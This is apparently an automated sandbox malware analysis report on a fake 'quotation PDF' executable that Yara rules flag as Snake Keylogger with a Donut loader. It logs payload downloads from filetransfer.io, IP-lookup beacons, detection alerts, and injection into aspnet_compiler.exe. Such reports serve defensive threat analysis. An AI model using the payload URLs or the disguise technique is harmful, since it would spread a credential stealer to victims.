Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49721 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49724 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49727 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49730 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49723 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49732 -> 188.114.96.3:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49722 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /data-package/Ky4pZ0WB/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /storage/download/klH4VFXHnzlT HTTP/1.1Host: s24.filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /data-package/Ky4pZ0WB/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: filetransfer.io
Source: global traffic	DNS traffic detected: DNS query: s24.filetransfer.io
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935E1D000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935EBD000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935EE8000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935F30000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935F42000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935EFB000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935ED5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935ED5000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935E6B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: aspnet_compiler.exe, 00000005.00000002.3401415580.0000022934340000.00000004.08000000.00040000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3404892860.0000022945D19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2646867703.0000028ACE451000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://filetransfer.io
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	String found in binary or memory: http://filetransfer.io/data-package/Ky4pZ0WB/download
Source: aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935EBD000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935EE8000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935E3C000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935F30000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935F42000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935EFB000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935ED5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2646867703.0000028ACE451000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2646867703.0000028ACE490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://filetransfer.io
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2646867703.0000028ACE490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://filetransfer.io/data-package/Ky4pZ0WB/download
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADF002000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADF2E2000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2665927288.0000028AE6ED0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADF002000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADF2E2000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2665927288.0000028AE6ED0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADF002000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADF2E2000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2665927288.0000028AE6ED0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935E1D000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935EBD000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935EE8000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935F30000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935F42000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935EFB000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935ED5000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935E6B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935E1D000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3401415580.0000022934340000.00000004.08000000.00040000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3404892860.0000022945D19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935E6B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935E1D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33p
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2646867703.0000028ACE4C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s24.filetransfer.io
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2646867703.0000028ACE4C3000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2646867703.0000028ACE4BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s24.filetransfer.io/storage/download/klH4VFXHnzlT
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADF002000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADF2E2000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2665927288.0000028AE6ED0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADF002000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2646867703.0000028ACE51D000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADF2E2000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2665927288.0000028AE6ED0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADF002000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADF2E2000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2665927288.0000028AE6ED0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49713 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.aspnet_compiler.exe.22934340000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.aspnet_compiler.exe.22934340000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.aspnet_compiler.exe.22934340000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.aspnet_compiler.exe.22934340000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 5.2.aspnet_compiler.exe.22945d200e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.aspnet_compiler.exe.22945d200e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.aspnet_compiler.exe.22945d200e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.aspnet_compiler.exe.22945d200e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 5.2.aspnet_compiler.exe.22934340000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.aspnet_compiler.exe.22934340000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.aspnet_compiler.exe.22934340000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.aspnet_compiler.exe.22934340000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 5.2.aspnet_compiler.exe.22945d200e8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.aspnet_compiler.exe.22945d200e8.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.aspnet_compiler.exe.22945d200e8.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.aspnet_compiler.exe.22945d200e8.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.2646867703.0000028ACEA50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000005.00000002.3401415580.0000022934340000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000005.00000002.3401415580.0000022934340000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000005.00000002.3401415580.0000022934340000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000005.00000002.3401415580.0000022934340000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000005.00000002.3404892860.0000022945D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000005.00000002.3404892860.0000022945D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000005.00000002.3400141664.0000022934010000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.2653955478.0000028ADE5A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: Process Memory Space: aspnet_compiler.exe PID: 5792, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: aspnet_compiler.exe PID: 5792, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe

Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FFD34795DDF	0_2_00007FFD34795DDF
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FFD34951540	0_2_00007FFD34951540
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FFD349504CA	0_2_00007FFD349504CA
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FFD34958F08	0_2_00007FFD34958F08
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FFD34954829	0_2_00007FFD34954829
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FFD349504F8	0_2_00007FFD349504F8
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FFD349605D4	0_2_00007FFD349605D4
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FFD34960415	0_2_00007FFD34960415
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 5_2_0000022934032F78	5_2_0000022934032F78
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 5_2_0000022934032B9C	5_2_0000022934032B9C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 5_2_0000022934036654	5_2_0000022934036654
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 5_2_0000022934033E5C	5_2_0000022934033E5C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 5_2_00000229340333A8	5_2_00000229340333A8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 5_2_0000022934031CC0	5_2_0000022934031CC0

Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe

Static PE information: No import functions for PE file found

Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000000.2141478030.0000028ACC719000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameUkyqbcntzq.exe: vs QUOTATION_SEPQTRA071244#U00faPDF.scr.exe
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2646867703.0000028ACE985000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_SEPQTRA071244#U00faPDF.scr.exe
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADE4A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_SEPQTRA071244#U00faPDF.scr.exe
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADF002000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIlvse.dll" vs QUOTATION_SEPQTRA071244#U00faPDF.scr.exe
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADF002000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_SEPQTRA071244#U00faPDF.scr.exe
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2666267100.0000028AE7130000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_SEPQTRA071244#U00faPDF.scr.exe
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2664755190.0000028AE6D50000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameIlvse.dll" vs QUOTATION_SEPQTRA071244#U00faPDF.scr.exe
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADF2E2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_SEPQTRA071244#U00faPDF.scr.exe
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADE51A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_SEPQTRA071244#U00faPDF.scr.exe
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADE841000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIlvse.dll" vs QUOTATION_SEPQTRA071244#U00faPDF.scr.exe
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2665927288.0000028AE6ED0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_SEPQTRA071244#U00faPDF.scr.exe
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Binary or memory string: OriginalFilenameUkyqbcntzq.exe: vs QUOTATION_SEPQTRA071244#U00faPDF.scr.exe

Source: 5.2.aspnet_compiler.exe.22934340000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.aspnet_compiler.exe.22934340000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.aspnet_compiler.exe.22934340000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.aspnet_compiler.exe.22934340000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 5.2.aspnet_compiler.exe.22945d200e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
